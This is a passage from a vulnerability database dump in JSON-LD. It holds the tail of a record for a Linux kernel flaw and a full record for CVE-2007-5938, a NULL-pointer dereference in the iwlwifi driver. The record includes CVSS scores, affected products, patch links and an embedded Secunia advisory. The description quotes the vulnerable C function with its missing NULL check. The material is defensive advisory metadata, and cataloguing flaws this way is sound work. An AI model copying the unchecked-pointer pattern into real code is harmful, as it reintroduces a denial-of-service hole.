      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8766"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8563"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13631"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3868"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8782"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:5634"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1035.36"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4344-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1050.55"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19051"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "159819"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163020"
      },
      {
        "db": "PACKETSTORM",
        "id": "163026"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "164140"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "159819"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163020"
      },
      {
        "db": "PACKETSTORM",
        "id": "163026"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "164140"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-02-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "date": "2020-02-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "date": "2020-04-29T15:56:59",
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "date": "2020-11-04T15:24:37",
        "db": "PACKETSTORM",
        "id": "159819"
      },
      {
        "date": "2021-06-17T17:53:22",
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "date": "2021-06-09T13:15:48",
        "db": "PACKETSTORM",
        "id": "163020"
      },
      {
        "date": "2021-06-09T13:19:21",
        "db": "PACKETSTORM",
        "id": "163026"
      },
      {
        "date": "2020-04-29T15:46:39",
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "date": "2021-02-25T15:29:25",
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "date": "2021-09-14T15:55:54",
        "db": "PACKETSTORM",
        "id": "164140"
      },
      {
        "date": "2020-04-29T15:55:05",
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "date": "2020-02-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "date": "2020-02-06T01:15:10.890000",
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186773"
      },
      {
        "date": "2022-07-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8648"
      },
      {
        "date": "2022-11-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      },
      {
        "date": "2022-07-28T00:08:45.217000",
        "db": "NVD",
        "id": "CVE-2020-8648"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "157489"
      },
      {
        "db": "PACKETSTORM",
        "id": "157480"
      },
      {
        "db": "PACKETSTORM",
        "id": "157485"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Resource Management Error Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-148"
      }
    ],
    "trust": 0.6
  }
}

var-200712-0597
Vulnerability from variot

The iwl_set_rate function in compatible/iwl3945-base.c in iwlwifi 1.1.21 and earlier dereferences an iwl_get_hw_mode return value without checking for NULL, which might allow remote attackers to cause a denial of service (kernel panic) via unspecified vectors during module initialization. The 'iwlwifi' drive is prone to a NULL-pointer dereference vulnerability because of a flaw in the 'compatible/iwl3945-base.c' file. Attackers can exploit this issue to trigger a kernel panic and cause denial-of-service conditions. Versions prior to iwlwifi 1.1.22 are vulnerable. Wireless WiFi Link is a wireless network card used in many notebooks. There is a loophole in the implementation of the Wireless WiFi Link network card driver, and a remote attacker may use this loophole to make the user's system unavailable. The iwl_set_rate() function of the compatible/iwl3945-base.c file in the iwlwifi driver of the Wireless WiFi Link network card has a null pointer reference vulnerability: static void iwl_set_rate(struct iwl_priv priv) { const struct ieee80211_hw_mode hw = NULL; struct ieee80211_rate *rate; int i; (1) hw = iwl_get_hw_mode(priv, priv->phymode); <-- not check ret priv->active_rate = 0; priv->active_rate_basic = 0; IWL_DEBUG_RATE("Setting rates for 802.11%c\n" , hw->mode == MODE_IEEE80211A ? 'a' : ((hw->mode == MODE_IEEE80211B) ? 'b' : 'g')); (2) for (i = 0; i < hw->num_rates; i++) { <-- null deref. (1) does not check the return value of iwl_get_hw_mode, if NULL is returned, it will cause (2) to reference a null pointer. ----------------------------------------------------------------------

A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.

Download and test it today: https://psi.secunia.com/

Read more about this new version: https://psi.secunia.com/?page=changelog


TITLE: Red Hat update for kernel

SECUNIA ADVISORY ID: SA29236

VERIFY ADVISORY: http://secunia.com/advisories/29236/

CRITICAL: Less critical

IMPACT: Unknown, Security Bypass, DoS

WHERE: Local system

OPERATING SYSTEM: Red Hat Enterprise Linux Desktop (v. 5 client) http://secunia.com/product/13653/ Red Hat Enterprise Linux (v. 5 server) http://secunia.com/product/13652/

DESCRIPTION: Red Hat has issued an update for the kernel. This fixes a security issue and some vulnerabilities, where one has an unknown impact and others can be exploited by malicious, local users to bypass certain security restrictions or cause a DoS (Denial of Service).

For more information: SA27842 SA27915 SA28696

SOLUTION: Updated packages are available via Red Hat Network. http://rhn.redhat.com

ORIGINAL ADVISORY: https://rhn.redhat.com/errata/RHSA-2008-0154.html

OTHER REFERENCES: SA27842: http://secunia.com/advisories/27842/

SA27915: http://secunia.com/advisories/27915/

SA28696: http://secunia.com/advisories/28696/


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200712-0597",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "pro wireless 3945abg",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "1.1.21"
      },
      {
        "model": "wireless wifi link 4965agn",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "intel",
        "version": "1.1.21"
      },
      {
        "model": "iwlwifi",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "intel",
        "version": "1.1.21 and earlier"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "iwlwifi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "1.2.21"
      },
      {
        "model": "iwlwifi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "1.2.20"
      },
      {
        "model": "net-wireless/iwlwifi 1.1.21-r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "iwlwifi",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "intel",
        "version": "1.2.22"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "26842"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:wireless_wifi_link_4965agn:1.1.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pro_wireless_3945abg:1.1.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ian Schram ischram@telenet.be",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-5938",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-5938",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-29300",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-5938",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200712-062",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-29300",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The iwl_set_rate function in compatible/iwl3945-base.c in iwlwifi 1.1.21 and earlier dereferences an iwl_get_hw_mode return value without checking for NULL, which might allow remote attackers to cause a denial of service (kernel panic) via unspecified vectors during module initialization. The \u0027iwlwifi\u0027 drive is prone to a NULL-pointer dereference vulnerability because of a flaw in the \u0027compatible/iwl3945-base.c\u0027 file. \nAttackers can exploit this issue to trigger a kernel panic and cause denial-of-service conditions. \nVersions prior to iwlwifi 1.1.22 are vulnerable. Wireless WiFi Link is a wireless network card used in many notebooks. There is a loophole in the implementation of the Wireless WiFi Link network card driver, and a remote attacker may use this loophole to make the user\u0027s system unavailable. The iwl_set_rate() function of the compatible/iwl3945-base.c file in the iwlwifi driver of the Wireless WiFi Link network card has a null pointer reference vulnerability: static void iwl_set_rate(struct iwl_priv *priv) { const struct ieee80211_hw_mode *hw = NULL; struct ieee80211_rate *rate; int i; (1) hw = iwl_get_hw_mode(priv, priv-\u003ephymode); \u003c-- not check ret priv-\u003eactive_rate = 0; priv-\u003eactive_rate_basic = 0; IWL_DEBUG_RATE(\"Setting rates for 802.11%c\\n\" , hw-\u003emode == MODE_IEEE80211A ? \u0027a\u0027 : ((hw-\u003emode == MODE_IEEE80211B) ? \u0027b\u0027 : \u0027g\u0027)); (2) for (i = 0; i \u003c hw-\u003enum_rates; i++) { \u003c-- null deref. (1) does not check the return value of iwl_get_hw_mode, if NULL is returned, it will cause (2) to reference a null pointer. ----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nRed Hat update for kernel\n\nSECUNIA ADVISORY ID:\nSA29236\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/29236/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nUnknown, Security Bypass, DoS\n\nWHERE:\nLocal system\n\nOPERATING SYSTEM:\nRed Hat Enterprise Linux Desktop (v. 5 client)\nhttp://secunia.com/product/13653/\nRed Hat Enterprise Linux (v. 5 server)\nhttp://secunia.com/product/13652/\n\nDESCRIPTION:\nRed Hat has issued an update for the kernel. This fixes a security\nissue and some vulnerabilities, where one has an unknown impact and\nothers can be exploited by malicious, local users to bypass certain\nsecurity restrictions or cause a DoS (Denial of Service). \n\nFor more information:\nSA27842\nSA27915\nSA28696\n\nSOLUTION:\nUpdated packages are available via Red Hat Network. \nhttp://rhn.redhat.com\n\nORIGINAL ADVISORY:\nhttps://rhn.redhat.com/errata/RHSA-2008-0154.html\n\nOTHER REFERENCES:\nSA27842:\nhttp://secunia.com/advisories/27842/\n\nSA27915:\nhttp://secunia.com/advisories/27915/\n\nSA28696:\nhttp://secunia.com/advisories/28696/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "BID",
        "id": "26842"
      },
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "PACKETSTORM",
        "id": "64302"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-5938",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "26842",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "29236",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-4211",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "44749",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139",
        "trust": 0.8
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2008:0154",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "11277",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-29300",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "64302",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "BID",
        "id": "26842"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "PACKETSTORM",
        "id": "64302"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "id": "VAR-200712-0597",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T10:46:25.216000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-53.11AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=215"
      },
      {
        "title": "iwlwifi: fix possibly NULL dereference in iwl_set_rate()",
        "trust": 0.8,
        "url": "http://www.intellinuxwireless.org/repos/?p=iwlwifi.git;a=commitdiff;h=25db44d4cdfe31d59223d74cb577f4a71aff1a40"
      },
      {
        "title": "ChangeLog-2.6.24",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.24"
      },
      {
        "title": "RHSA-2008:0154",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2008-0154.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/26842"
      },
      {
        "trust": 2.0,
        "url": "http://bugs.gentoo.org/show_bug.cgi?id=199209"
      },
      {
        "trust": 2.0,
        "url": "http://article.gmane.org/gmane.linux.drivers.ipw3945.devel/1618"
      },
      {
        "trust": 1.7,
        "url": "http://osvdb.org/44749"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2008-0154.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/29236"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2007/4211"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10787"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2007/4211"
      },
      {
        "trust": 1.0,
        "url": "http://www.intellinuxwireless.org/repos/?p=iwlwifi.git%3ba=commitdiff%3bh=25db44d4cdfe31d59223d74cb577f4a71aff1a40"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5938"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-5938"
      },
      {
        "trust": 0.7,
        "url": "http://www.intellinuxwireless.org/repos/?p=iwlwifi.git;a=commitdiff;h=25db44d4cdfe31d59223d74cb577f4a71aff1a40"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/11277"
      },
      {
        "trust": 0.4,
        "url": "http://rhn.redhat.com/errata/rhsa-2008-0154.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.intellinuxwireless.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/29236/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/13652/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/28696/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://psi.secunia.com/?page=changelog"
      },
      {
        "trust": 0.1,
        "url": "https://psi.secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://rhn.redhat.com"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/27842/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/13653/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/27915/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "BID",
        "id": "26842"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "PACKETSTORM",
        "id": "64302"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
